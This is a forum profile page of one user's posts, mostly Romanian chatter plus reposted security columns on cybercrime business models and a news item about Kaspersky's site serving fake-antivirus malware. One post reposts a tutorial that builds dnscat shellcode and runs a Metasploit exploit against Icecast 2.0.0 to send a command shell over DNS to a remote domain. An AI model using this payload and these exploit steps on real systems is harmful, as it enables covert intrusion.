Jump to content

begood

Active Members
  • Posts

    3972
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by begood

  1. stiri facute ... ca sa fie acolo. nu e nimic nou, decat "speranta".
  2. Am descoperit din intamplare, recent, un site interesant : Wakoopa E un tracker pentru software si pagini web, instalezi un software si iti creeaza un profil (public/privat) pe care iti vor aparea toate programele pe care utilizezi in timp real, primesti recomandari, vezi ce utilizeaza altii, ce e in top, ce a aparut nou si asa mai departe.
  3. laserele astea ce le poti cumpara la orice chiosc, nu au nici puterea nici precizia necesara sa duca la distante mai mari de 30 metrii. daca cumperi un laser mai puternic, ai sanse, dar costa ceva banuti.
  4. If you tried to download and/or visit Kaspersky’s web site yesterday, please check if your computer didn’t get infected. Their web site was hacked and their download pages were redirecting users to a fake AV (malware) page. The malware was getting loaded from http://77.78.246.143, which is already blacklisted by Google: Has this site acted as an intermediary resulting in further distribution of malware? Over the past 90 days, 77.78.246.0 appeared to function as an intermediary for the infection of 46 site(s) including mygidoctors.com/, bruyereu.eu/, bitterpiecomix.com/. Has this site hosted malware? Yes, this site has hosted malicious software over the past 90 days. It infected 1941 domain(s), including franchesco.kwik.to/, soloingenieria.net/, marchex.com/. Users are complaining about it in their forums, but Kaspersky has not released an official statement about it: Kaspersky USA Download Link = Attack Page??? - Kaspersky Lab Forum Kaspersky website hacked?? - Calendar Of Updates Update: Kaspersky confirmed the incident to itpro.co.uk: UPDATED: Kaspersky hit by cyber criminals? | IT PRO It shows that even security companies are not immune from this types of attacks. Hopefully they will post an update soon. Kaspersky site hacked and redirecting users to fake AV | Sucuri
  5. recomand Last Torrents si evident eztv.it
  6. The industrialized hackers are intent on one goal--making money. They also know the basic rules of the business of increasing revenues while cutting costs. (Part IV In a Series on Cybercrime. Read Part I, Part II, Part III) As hackers started making money, the field became full of “professionals” that inspired organized cyber crime. Similar to industrial corporations, hackers have developed their own business models in order to operate as a profitable organization. What do these business models look like? Hacker Business Models The industrialized hackers are intent on one goal--making money. They also know the basic rules of the business of increasing revenues while cutting costs. Increasing Revenue Data has become the hacker’s currency. More data, more money. So the attack logic is simple: the more attacks, the more likely victim—so you automate. But an interesting variation has emerged. A few months ago, Imperva’s ADC research team witnessed a phishing campaign which employed such a business model. In this scheme, a master hacker wrote a phishing toolkit for other hackers to use. The “proxy” hackers downloaded the kit, chose a phishing site using a simple GUI dashboard and, just like that, the proxy hackers were good to go. The popularity of the kit soared, since, as opposed to traditional phishing setups where hackers are required to set up and allocate storage for the data collection, this kit offered to remove that back-office work from the “proxy” hacker. The master hacker had actually provided with his kit “cloud storage” for the fraudulently obtained credentials. The credentials, once retrieved, would go to the cloud storage and reside in a location allocated only for the single “proxy” hacker. Controls were set such that one proxy hacker could not access the allocation area of another proxy hacker. The proxy hackers could continue with their attacks without every worrying about being cheated out by a fellow hacker. But this kit had a twist: although access to the credentials storage was secured from the eyes of fellow proxy hackers, this was not the case with the master hacker. A backdoor on the storage system allowed the viewing of all these credentials by the master hacker who wrote the kit. In reality then, all the proxy hackers were each gathering the credentials for the master hacker! Now consider the scenario – assume each proxy hacker gains a dozen credentials. And a thousand hackers have downloaded the kit – that’s already over 10K worth of valuable data without the master hacker ever needing to dirty his hands with the actual target! In fact, the master hacker boasted some 200K downloads. This number may surely be exaggerated, but the point is clear - it is widely in use. Cutting Costs Similarly to any organization, hackers want to tighten their belt on budget spending. Time is money, even hacker time. So instead of re-developing the wheel, hackers are looking for already-existing tools which they can re-use. Templates and kits exist for just about every kind of attack. For example, the phishing kit downloaded by the proxy hackers as mentioned earlier. Off the shelf kits are not the only way to cut costs. Different technology solutions are deployed to cut the costs of storage and hosting. We saw how hackers were lured to use cloud technologies for their backend data collection. But they are also using free hosting providers. In a XSS attack campaign, the hacker was storing all the stolen credentials on such a free hosting site. Digging deeper and the researchers found that the hosting provider was servicing in a similar manner numerous cyber-thieves. Another cost-cutting method is to increase the capacity of each attack. This is one of the reasons why controlling servers are so appealing to hackers. Utilizing the server’s resources – for example, network bandwidth and CPU – a stronger attack impact could be performed. In fact, a recent Distributed Denial of Service (DDoS) attack was achieved by employing servers in the attack campaign. Marketing What’s the point of having a state-of-the art hacker tool if no one is going to use it? For this the hackers turn to the marketing department. The aforementioned phishing kit was advertised in different underground hacker forums. But even more mainstream venues are used. For example, last month Damballa uncovered the IMDDOS botnet. The operators of the botnet had actually set up a public facing Web site offering their service - performing a Distributed Denial of Service (DDoS) attack against the target of the user’s choice. All the user had to do was to go to that certain website to subscribe to the service. Like any successful business, it is not enough to just advertise. To really penetrate the market, you need to show you know your stuff. And hackers are even using YouTube as a channel to promote their skills. Video tutorials of hacks are common. For instance, a YouTube tutorial of an XSS attack was uploaded to YouTube in 2007. The 2010 XSS attack campaign mentioned earlier, used nearly identical steps to perform the attack. Advice • Study the hacker business model – Understanding these models allows the security industry to focus their controls on the problem itself, rather than on the symptom. Up until now, many phishing-targeted companies (banking applications, retails, webmail, etc) were taking off the malicious sites, one URL at a time. But that’s an endless game: given that hackers only need to repost the Web front end with a new URL, they’re back in business within a few clicks. However, when the business model is understood, namely, that hackers are fool-sourcing their attacks, these organizations can locate the brain and heart of the malicious operation. Removing these vital organs, and the hacker activity is slowed down as these proxy hackers look for another kit and storage. • Educate yourself on the way of hackers - Study the techniques used in order to put the necessary controls to protect your system against different classes of attacks. Remember the 2007 tutorial? Watch and learn! • Blacklist known “hacker”-servicing hosting providers - if an IP address belonging to a hosting site known to be used by the hacker, consider blacklisting it. But here is also a message to free hosting sites - be more vigilant as to who is using your services. Coming Up Next – Technologies Hackers Are Using Understanding the business models the hacker industry is developing is paramount for knowing how to apply the correct protection. But in order to be one step ahead of the hackers, it is required to know the technologies that hackers are using. So stay tuned as I turn to the emerging hacker technologies! (This Column is Part IV In a Series on Cybercrime. Read Part I, Part II, Part III)An Inside Look at Hacker Business Models | Information Security News - Security Week - IT Security News & Expert Insights
  7. Protecting Your Data from The Automated Cyber Mafia (Part III In a Series on Cybercrime. Read Part I, Part II) In my previous column I presented you with quite a gloomy picture. On the one hand we are not the sole handlers of our data. We happily delegated this responsibility to financial and medical institutions, to our preferred online ticketing agency and to Facebook. But on the other hand, this convenience comes with a high cost. The cyber-mafia is now after that data. We do not need to, and should not, sit on the sidelines and watch the criminals play with our data. Rather, organizations should enhance their security controls according to the threat landscape. Once they store our sensitive information, they should bolster the controls around their systems. If the safeguards put in place require hackers to invest more time, effort and resources, they will move on to a different target. Recap – The Hacking Industry As profits from data theft have grown, the hacking community has evolved. The industry’s main vehicle of operation is botnets. These are compromised machines (zombies) that, unknown to their physical owners, are controlled by hackers. They are like leeches on the machines, probing the network to carry on attacks on behalf of criminal users. The business models used by hackers are similar to those used by any successful organization in any modern industry. The three pillars of this industry are identified as: the supply chain, optimization and automation. Understanding the hacking industry is imperative to protecting data. Supply Chain. The supply chain within the hacking industry is comprised of: • Researchers: These individuals hunt for vulnerabilities in applications, frameworks, and products, and feed their knowledge to malicious organizations for the sake of profit. In particular, they focus on browser vulnerabilities to optimize botnet infections. • Farmers: The farmers maintain the botnets in cyberspace and seek to increase their numbers. They control their zombies using a series of commands and controls (C&C). • Dealers: Dealers rent botnets based on size and length of usage. They use these botnets to conduct different types of attacks, such as extracting valuable data, inflicting a DDoS, disseminating spam and executing brute-force password attacks. • Consumers: These individuals monetize the stolen information. They know how to fake credit cards to steal identities, advertise through spam and commit fraudulent transactions. Optimization. Hackers optimize their resources in order to gain the most from compromised applications or computers. Their C&C centers are managed to gain the most from their botnets, fortifying their size and strength while taking out all other competition intent on controlling the same machines. Automation. This is the key aspect of the hacking industry for maximizing the attack process. Automation is what made the hacker community into the hacker enterprise. Handling this building-block of the industry should be a defining process when applying security controls. For more detailed information on each topic and examples, I suggest returning to my previous column which introduced the hacking industry. Advice So how do you deal with this automated, growing industry? • Explain the enemy to management. One challenge that we face time and again in the field is that scared look on decision-makers’ faces when we talk about security. Sadly, many security teams’ reflex is to begin explaining XSS, SQL Injection, CSRF, Drive-by-Downloads…. You get the point! Decision makers don’t get it. But if you paint a picture that articulates to management who wants the data and how outgunned you are, you’re more likely to get the resources needed. • Remember that companies of all sizes are at risk. All applications, whether small or large, are attractive targets. Servers and workstations are identified as potential targets. In short, being victimized is not personal. This means that the smaller organizations that used to rely on their small customer base as a “preventive” measure cannot take that approach anymore. Rather, all companies alike must start paying attention to application security, either directly or through their hosting providers. • Beat automated attacks at their own game. The key factor here is automation. Slowing down an attack is most often the best way to make it ineffective. A one second delay will not be noticed by most users, but this can make the difference for an automated attack - just enough of a difference to have the bot move onto another worthwhile target. Here are a few examples on how to delay botnet activity: Adjusted Blocking - Black-list the IPs known to have originated from malicious sources and botnets. This list can be created from past attack campaigns and by looking at the contents of the messages, as well as by collaborating with different organizations to keep an up-to-date list of current hacker activity. Remember, with today’s fast pace of hacker activity, it is important to constantly keep these lists reflective of real-time malicious sources. CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) - This technique attempts to distinguish humans from bots by providing a test that only a human can solve. I’m sure you’ve all encountered traditional CAPTCHAs which come in the form of character recognition. Other methods also exist, such as choosing the correct description of an image, or solving a simple riddle. Adaptive Authentication - When automation is suspected during a highly sensitive transaction, users should be alerted that malware may have taken over their browser. The alert could involve requesting the user to supply additional authentication details such as repeating the password or answering previously recorded questions. Client-side Computational Challenges - In this technique, the browser, on behalf of the client, is required to solve a computational challenge. Solving this challenge requires some power consumption, but the solution can easily be verified by the server. Disinformation – Botnets attempt to follow each link on a website. Feeding the site with many bogus links is therefore an effective countermeasure. A human would not follow these links, but an automated tool will follow them indefinitely. • Beef up data control defenses. There is a reason bad reputations exist, and companies should take them into consideration. One method is to apply forensics from recent attacks in order to strategically enhance defenses. Essential forensic information includes anonymous proxies, TOR relays, active bots, or references from compromised servers. A second method is to incorporate reputation-based controls within the company’s security initiative. Such controls leverage unique and identifiable characteristics from third party attacks to better help filter Web traffic. Coming Up Next – the New Business Models Knowing the pillars of the hacking industry and their roles helps us gain better understanding of attack campaigns and the business models hackers are developing. Next week I will discuss in depth some of these business models. So stay tuned as I dress these hackers with a suit and tie! (This Column is Part III In a Series on Cybercrime. Read Part I, Part II) Protecting Data from The Automated Cyber-Mafia | Information Security News - Security Week - IT Security News & Expert Insights
  8. Do you remember those ’80s and ’90s movies that portrayed the same hacker over and over, just in a different setting? It was always a kid wizard sitting in his parent’s basement hammering away on the keyboard. Or a student loner who hacked into the university’s administration system to change his grades. That’s the image engrained in our brains when we hear the word “hacker.” In reality, when we talk about hackers, we are talking about a fully organized, well-oiled machine intent on gaining money. And hacking is most definitely a big industry. One estimate puts the its size at $1 trillion. The Botnet Army The objective today is data – the hacker’s currency. The weapon of choice is the botnet—armies of unknowingly enlisted computers controlled by hackers. Modern botnets scan and probe the Web seeking to exploit vulnerabilities and extract valuable data, conduct brute force password attacks, disseminate spam, distribute malware, and manipulate search engine results. These botnets operate with the same comprehensiveness and efficiency used by Google spiders to index websites. Researchers estimate that some 14 million computers have already been enslaved by botnets. This number is expected to grow quarterly at double-digit rates. The Pillars of the Hacking Industry The hacking industry has evolved over the years in order to efficiently operate and manage these massive cyber-armies and gain profit from them. Recently, Intel CEO Paul Otellini said that security had become the third pillar of business (the other two, in Intel’s view, are networking and power consumption). What is the equivalent for the hacking industry? The hacking industry’s pillars are supply chain, optimization and automation. The Hacker’s Supply Chain In recent years, a clear definition of roles and responsibilities has developed within the hacking community, forming a supply chain that resembles that of a drug cartel. Last year’s indictment of Albert Gonzalez, the hacker mastermind behind one of the greatest hacks in U.S. history - the theft of 40 million credit cards from TJX systems - provided us with further insight into the layered roles of the data-theft cartel. The division of labor within the hacking organization breaks down like this: • Researchers: These are vulnerability researchers and exploit developers who keep clean when it comes to the actual exploitation of systems. Researchers’ sole responsibility is to hunt for vulnerabilities in applications, frameworks, and products, and then feed their knowledge to malicious organizations for the sake of profit. In particular, they focus on browser vulnerabilities to optimize botnet infections. Stephan Watt, Albert Gonzalez’s friend, exactly fits into the researcher mold. His highly technical skills were used to write the sniffing software for TJX systems – although he claims that he was not fully aware of Gonzalez’ ultimate scheme. • Farmers: A farmer’s primary responsibility is to maintain and increase the presence of botnets in cyberspace. Farmers write botnet software and attempt to infect as many systems as possible worldwide. They control their zombies using a series of commands and controls (C&C). The farmers use the most modern technologies to keep these commands from being detected. For example, Twitter tweets and Facebook profiles have recently been used as command channels to operate zombies. • Dealers: Dealers are tasked with performing the actual attack. The dealers rent botnets, which are priced according to the size of the botnet and length of usage. They use the botnets to conduct a variety of different attacks, including: • Probing Web application vulnerabilities to extract valuable data • Inflicting a Distributed Denial of Service (DDoS) attack • Disseminating spam. Last year, Alex Ralsky, who gained the notorious nickname “Spam King,” pleaded guilty to using botnets to compromise tens of thousands of computers so they could be used to send out spam. • Executing brute force password attacks • Consumers: These are the crooks who actually monetize the stolen information. After all, the dealers gathered the data, but the data needs to be translated into money. Enter the criminal who knows how to fake credit cards, to steal identities, advertise through spam or commit fraudulent transactions. In 2008 Russian hackers committed a nearly $10 million fraud against RBS WorldPay. Recently, Viktor Pleschuk, the hacker mastermind agreed to snitch on fellow partner in crime as a “Get Out of Jail” ticket. His confessions shed light on how stolen data was used to counterfeit credit cards and translate data into cash. Optimization Hackers are optimizing their resources in order to gain the most from compromised applications or computers. How do hackers optimize attacks? • Better management: Corporate executives are famous for their use of corporate dashboards showing corporate performance. Likewise, hackers have tools to keep detailed command and control (C&C) over the effectiveness of their operations. • Power: The more compromised servers, the larger the botnet. Also, the more powerful the computer, the easier the DDoS, as a recent DDoS attack showed. An acquired zombie machine may now be exploited for phishing and spam, to inflict a DDoS or to perform blackhat search engine optimization (SEO). Moreover, a compromised PC may be used as a relay to a corporate machine in order to retrieve enterprise data and/or to further distribute malware. • Killing Competitors: Just like in the mafia wars, hacker organizations compete against one another. The Spy Eye toolkit is known to first remove the infamous Zeus botnet software before making an installation on a zombie machine. Automation General Patton once said, “There is only attack and attack and attack some more.” During the industrial revolution, manufacturing was optimized by automation. And automation is the key technique of the hacking industry for maximizing the attack process. Here are several examples of processes that hackers have automated: • The use of search engines to find potential target applications. • The distribution of commands through forums and Web pages in order to engage zombies as part of a botnet. This whole management process is highly automated, and hackers take pride in offering a complete attack with just a few mouse clicks. • Attack templates and kits. Hackers do not need to re-invent the wheel of cyber-crime. Kits exist for just about everything. Automation is what made a hacker community into a hacker enterprise. We’ve seen mass waves of SQL injection attacks against half a million sites within one day. As a part of Imperva’s Hacker Intelligence Initiative, we witnessed the effects of a muscular XSS attack campaign conducted in the space of just one hour. Coming Up Next - Advice Hackers are after your data. They are growing bigger, faster and stronger by the day. It does not help to simply recognize the problem. It is important to understand how to guard data against this industry. Once this is clear, we can dive ahead and provide solutions. So stay tuned for next week as I discuss different points of advice for protecting data from Hackers Inc. The Structure of a Cybercrime Organization - Hackers Have Supply Chains Too! | Information Security News - Security Week - IT Security News & Expert Insights
  9. Cybercrime - Staring into the Eye of the Beast I have a problem. Actually, we all have a problem. You see, our life is gooood. Digitally, at least. We’re on the technology speed train, addicted, going full throttle without any desire to slow down. On the contrary, we strive to shift gears to quicken technology’s advancement. We can’t see our lives differently now and we’re expecting things to just get better. But here’s the problem – the bad-guys know this too. Hackers Are One Step Ahead Since the early days of the WWW, companies have been fighting hackers. Actually, the term fighting is not really a good choice of words here. It’s more like defending their systems in an ad-hoc manner to protect against the threat of the day before. As the Internet evolved, so did hacking and its motivations. Two decades ago hackers mainly got a kick out of simply rendering a banking site’s servers unavailable. Vendors reacted by applying network security controls. Hackers installing viruses? Deploy an anti-virus at each end station. Hackers performing DoS attacks? Router ACLs, Network Firewalls, IP/DS and VPNs will fix this. But while the deployed security controls were beginning to secure past technologies, Web 2.0 came right around the corner. And as the Web allowed us to share information, hackers at this stage realized that they could now hold the keys to the kingdom. That information—data jumping from system to system – is worth a whole load of money. And data is now the hacker’s currency. The New Security Approach – Be Proactive! Frustrating? Of course! Can we prevent cyber-crime? No. Where there is money, there is crime. Are we then just left sitting on the bench waiting for the next wave of crime to come around and hope it will bypass our data? It is precisely this last question that security practitioners have been asking. The answer is an absolute no - a new security approach needs to be taken. As an industry, we need to move beyond vulnerability patching and threat management. We need an approach that is not reactive to yesterday’s hack but rather anticipates tomorrow’s. Security controls can then quickly adapt to the threat landscape. Proactive is the new defense. The proactive security approach comprises two parts: 1. Knowing the threat landscape – profiling the hackers, their organizational hierarchy, business models and modus operandi. With this knowledge, current security controls could be strengthened. It could even be used to achieve immediate security value. The intelligence could be used to identify compromised computers being actively exploited to launch attacks, to quickly identify attack campaigns at their early stages, to discover zero-day vulnerabilities in the wild rather than in the lab, and to identify targets of upcoming attacks in advance. In the longer term, understanding the hacker landscape could allow new security controls to be developed and deployed in advance to protect against the next attack. 2. Implementing data security controls. Companies are beginning to understand their need to strengthen their applications, databases and file systems from insiders as well as from hackers. Proactive Security – Sci-Fi? Proactive security is a relatively new concept from the past couple of years. And although it’s a young concept, we’re seeing it already applied in the field. For example, a couple of months ago my employer, Imperva, announced a vendor-driven initiative named the “Hacker Intelligence Initiative” (HII) which aims to track and monitor hacker activity. The HII is a formalization of ongoing research from the previous year where different attack campaigns were unfolded right beneath our noses. After just a handful of attack campaigns, the company gained an understanding of some of the technologies and attack methods frequently employed by attackers, and of the similarities as well as differences between attacks. New business models were another small result of these findings. Using proactive security techniques, a security vendor specializing in fraud, Trusteer, was able to uncover a Zeus C&C botnet that mainly targeted UK banks. The banks were able to beef up their security accordingly. A few days later, a security company, M86, unveiled the discovery of another bank-hitting botnet. Continuing on the theme of botnets, another security vendor, AVG, recently discovered a botnet “Mumba” and provided some insight into the technology used. Understanding the Hacker Landscape It will take time to paint a clear picture of the hackers. We have some brush strokes, but not the full painting. We hope though that with a new, proactive approach, we will be able to shed some light on the landscape. In this series I'll describe this hacker landscape by presenting to you findings resulting from the proactive security approach vendors are taking. I will provide current examples from recent incidents where new discoveries about the hacker landscape can give us an idea how to protect our systems. Accordingly, I’ll outline the steps vendors should take, or discuss the required new-generation security enhancement. In my next column I’ll discuss the attacker profile. And just as a trailer-teaser I’ll tell you it’s not what Hollywood wants you to believe, so stay tuned as I talk about Hacking Inc.! Staring into the Eye of the Beast - Hackers are One Step Ahead | Information Security News - Security Week - IT Security News & Expert Insights
  10. Hey all, I’ve been letting other projects slip these last couple weeks because I was excited about converting dnscat into shellcode (or “weaponizing dnscat”, as I enjoy saying). Even though I got into the security field with reverse engineering and writing hacks for games, I have never written more than a couple lines of x86 at a time, nor have I ever written shellcode, so this was an awesome learning experience. Most people start by writing shellcode that spawns a local shell; I decided to start with shellcode that implements a dnscat client in under 1024 bytes (for both Linux and Windows). Like I always say, go big or go home! If you just want to grab the files, here are some links: Win32 shellcode – assembler Win32 shellcode – binary Win32 shellcode – C array Win32 Metasploit module Linux shellcode – assembler Linux shellcode – binary Linux shellcode – C array If you want to get your hands dirty, you can compile the source — right now, it’s only in svn: svn co http://svn.skullsecurity.org:81/ron/security/nbtool cd nbtool make That’ll compile both the standard dnscat client/server and, if you have nasm installed, the Linux and Windows shellcodes. On Windows, you’ll need nasm to assemble it. I installed Cygwin, but you can compile the Windows shellcode on Linux or vice versa if you prefer. The output will be in samples/shellcode-*/. A .h file containing the C version will be generated, as well: $ head -n3 dnscat-shell-test.h char shellcode[] = "\xe9\xa2\x01\x00\x00\x5d\x81\xec\x00\x04\x00\x00\xe8\x4e\x03\x00" "\x00\x31\xdb\x80\xc3\x09\x89\xef\xe8\x2e\x03\x00\x00\x80\xc3\x06" ... And, of course, the raw file is output (without an extension), that can be run through msfencode or embedded into a script: $ make [...] $ wc -c samples/shellcode-win32/dnscat-shell-win32 997 samples/shellcode-win32/dnscat-shell-win32 $ wc -c samples/shellcode-linux/dnscat-shell-linux 988 samples/shellcode-linux/dnscat-shell-linux Unless you want to be sending your cmd.exe (or sh) shell to skullseclabs.org, you’ll have to modify the domain as well — the very last line in the assembly code for both Windows and Linux is this: get_domain: call get_domain_top db 1, 'a' ; random db 12,'skullseclabs' ; <-- To modify domain, change this... db 3,'org' ; <-- and this. The number is the section length. db 0 The two lines with the domain have to be changed. The number preceding the name is, as the comment says, the length of the section ('skullseclabs' is 12 bytes, and 'org' is 3 bytes). This process is automated with the Metasploit payload, as you'll see. Encoding with msfencode msfencode from the Metasploit project is a beautiful utility. I highly recommend running shellcode through it before using it. The most useful aspect with shellcode is, at least to me, the ability to eliminate characters. So, if I need to get rid of \x00 (null) characters from my strings, it's as easy as: $ msfencode -b "\x00" < dnscat-shell-win32 > dnscat-shell-win32-encoded [*] x86/shikata_ga_nai succeeded with size 1024 (iteration=1) If you're planning on using this in, for example, Metasploit, you don't have to worry about the msfencode step -- it'll do that for you. Metasploit payload Speaking of metasploit, yes! I wrote a metasploit payload for dnscat. First, there are a number of caveats: This is highly experimental This doesn't have a proper "exitfunc" call -- it just returns and probably crashes the process This is set up as a single stage, right now, and is 1000 or so bytes -- as a result, it won't work against most vulnerabilities The dnscat server isn't part of Metasploit, yet, so you'll have to compile run it separately That being said, it also works great when it's usable. The target I use for testing is Icecast 2 version 2.0.0 (WARNING: don't install vulnerable software on anything important!), which is included on the SANS 560 and 504 CDs (thanks Ed!). It's free, GPL, reliable, and has 2000 bytes in which to stuff the payload. So, the steps you need to take are, Install Icecast2 on your victim machine (Win32) Download the experimental dnscat Metasploit module and put it in your Metasploit directory (modules/payloads/singles/windows/) Fire up a dnscat server on your authoritative DNS server (dnscat --listen) -- see the dnscat wiki for more information Run Metasploit (msfconsole) and enter the following commands:msf > use exploit/windows/http/icecast_header msf exploit(icecast_header) > set PAYLOAD windows/dnscat-shell-win32 PAYLOAD => windows/dnscat-shell-win32 msf exploit(icecast_header) > set RHOST 192.168.1.221 RHOST => 192.168.1.221 msf exploit(icecast_header) > set DOMAIN skullseclabs.org DOMAIN => skullseclabs.org msf exploit(icecast_header) > exploit Exploit completed, but no session was created. Meanwhile, on your dnscat server, if all went well, you should see: $ sudo ./dnscat --listen Waiting for DNS requests for domain '*' on 0.0.0.0:53... Switching stream -> datagram Microsoft Windows [Version 5.2.3790] © Copyright 1985-2003 Microsoft Corp. C:\Program Files\Icecast2 Win32> You can type commands in, and they'll run just like a normal shell. Be warned, though, that it is somewhat slow, due to the nature of going through DNS. Why bother? The big advantage to this over traditional shellcode is that no port, whether inbound or outbound, is required! As long as the server has a DNS server set that will perform recursive lookups, it'll work great! SkullSecurity Blog Archive Weaponizing dnscat with shellcode and Metasploit
  11. begood

    Pgp

    ce pentru cunoscatori ? te doare gura sa spui ce contine arhiva ? sau e "strategie frate" sa o descarce cat mai multi ?
  12. ^ asiaticele astea evident ca global, cum sa-mi propun sa devin milionar in euro doar pe piata romaneasca ?
  13. nu ma intereseaza un trai decent, vreau ca in cel mult 7 ani sa ajung miliardar in euro. primii 3 ani sa recuperez investitia, iar in restul sa evoluez in diferite domenii.
  14. hai sa-ti zic de ce nu o sa mearga cu garsoniere sau cu apartamente mici pe care le inchiriezi la studenti : statul. la fiecare apartament pe care il detii in plus platesti o taxa care iti cam taie tot profitul. daca tot mergi pe ideea asta, mai bine inchiriezi spatiu comercial, dar pentru asta iti trebuie sa detii acel spatiu, 100k nu ajung sa il cumperi si sa il si amenajezi => fail.
  15. fashion glamour... ok. si cum faci bani ? de unde aduci "vedete" care ca-ti inghita reclamele si sa vrea neaparat sa vina la tine la salon ? pe scurt, clientii mari cum ii ademenesti, tu neavand un renume.
  16. vreau 85%. frumosul "asta" costa mai mult de 100k cu tot cu cumparatul clubului. ok, am face clubul, cum am evolua ? cat estimezi ca vom scoate in primul an ? dar primii 3 ani ?
  17. pentru ce ai face acel datacenter ? dezvolta si ideea asta
  18. Ati face voi cu ea ? Sa spunem ca porniti de la 100.000 euro. - ce domeniu ati studia pentru a investi acei bani - cum ati studia domeniul - ce dificultati credeti ca veti intampina - cum va organizati la inceput si pe parcurs - cu cine va veti asocia pentru a evolua - cat procent din profit credeti ca mi se cuvine, de ce (argumentati) Vreau sa vad ce planuri scoateti. Reguli thread : - nu admit offtopic de niciun fel - fara raspunsuri de sub 30 cuvinte (le numar ! ) - vreau sa vad ca, cantariti fiecare raspuns si il atacati din cat mai multe puncte de vedere posibile - nu trebuie sa fie neaparat un proiect online, poate fi de exemplu si un hotel
  19. @loki nu e vorba doar de windows-uri originale, ci de toata suita aia de software sunt zeci.
  20. tragedie .
  21. shit. Poate ne ajuta un user experimentat de pe forum la spargerea encriptiei si crearea unui unpacker ?
  22. formatul sdc este Secure Download Cabinet, trebuie unpacker. imagi.pl Downloads UnpackSDC [sdcFile] [OutputDir] <skipcrc> SdcFile - file to unpack OutputDir - directory to unpack to skipcrc - when specified, crc check will be skipped http://oknos.fi.muni.cz/ ftp://ftp.sh.cvut.cz/ inca 2 mirror-uri pentru msdnaa
  23. lasttorrents.org + eztv.it
  24. dezactiveaza-le pe toate, apoi gaseste vinovatul, prin eliminare. sterge cache-ul browserului cu tot cu cookies.
  25. nu-i site-ul meu, n-am de-a face cu el, e vorba de eveniment.
×
×
  • Create New...